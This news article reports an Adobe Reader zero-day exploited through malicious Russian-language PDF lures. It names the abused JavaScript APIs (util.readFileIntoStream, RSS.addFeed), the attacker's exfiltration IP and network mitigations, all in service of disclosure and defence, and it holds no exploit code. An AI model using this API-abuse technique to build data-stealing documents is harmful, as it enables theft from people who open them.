Hackers have been exploiting an as-yet unidentified flaw in Adobe Reader since at least November 2025. This zero-day vulnerability was first discovered by security expert Haifei Li, founder of EXPMON, a sandbox-based exploit detection system.
How the attack works
Haifei Li found that the attack is triggered as soon as a victim opens a specially crafted PDF file. One sample identified on VirusTotal was named “Invoice540.pdf,” suggesting the attackers are using fake invoices as a lure. Li notes that the exploit is particularly dangerous because it runs on the latest version of Adobe Reader without requiring any additional user interaction.
Once the file is open, it runs hidden, heavily obfuscated JavaScript code. This code hijacks two built-in software tools called APIs: util.readFileIntoStream, which is normally used to handle files, and RSS.addFeed, which usually manages web updates. By abusing these, the hackers can secretly steal data from the computer and send it to a remote server at the address 169.40.2.68.
Li further explained in a blog post that this is just the first step because by collecting info and fingerprinting the computer, hackers can prepare for even worse actions. This includes Remote Code Execution (RCE), which lets them run their own programmes on the victim’s machine, or a Sandbox Escape (SBX) to bypass built-in security barriers and take full control.
Dear security community/researchers, I'd really like to call to look at this https://t.co/BuvZtpBChe, this information shows that the threat actors behind this Adobe Reader 0day attack was not just collecting local information but was really delivering additional exploits, need…
— Haifei Li (@HaifeiLi) April 8, 2026
Russian oil and gas lures
The attackers seem to be focused on targeting specific groups. A security analyst, Giuseppe Massaro (Gi7w0rm), looked into the malicious documents, identifying that they were written in Russian and that the text in the PDFs talks about news and events in the Russian oil and gas industry to make the emails look real.
Apparent #0day in Adobe Reader has been observed in the wild. Seems to exploit part of Adobe Readers JavaScript engine. Documents observed contain Russian language lures and refer to issues regarding current events related to the oil and gas industry in Russia. https://t.co/QRu63fuAP4
— Gi7w0rm (@Gi7w0rm) April 8, 2026
More concerning is that this is not the first time Adobe Reader has faced similar issues. A previous flaw, tracked as CVE-2024-41869, was also reported by Haifei Li, although Adobe did not confirm whether it had been exploited in real-world attacks at the time.
Adobe was notified about the flaw around 7 April, but they have not released an update to fix it just yet. Li, who has a long history of finding bugs at companies like Microsoft, said it is vital for the public to know about this now so they can stay safe.
Since there isn’t any official fix or patch available as yet, be careful when opening any PDF files from people you don’t know, and those who manage office networks must block internet traffic that mentions Adobe Synchronizer in the header to stop the hackers from communicating with the infected computers.
Deeba Ahmed
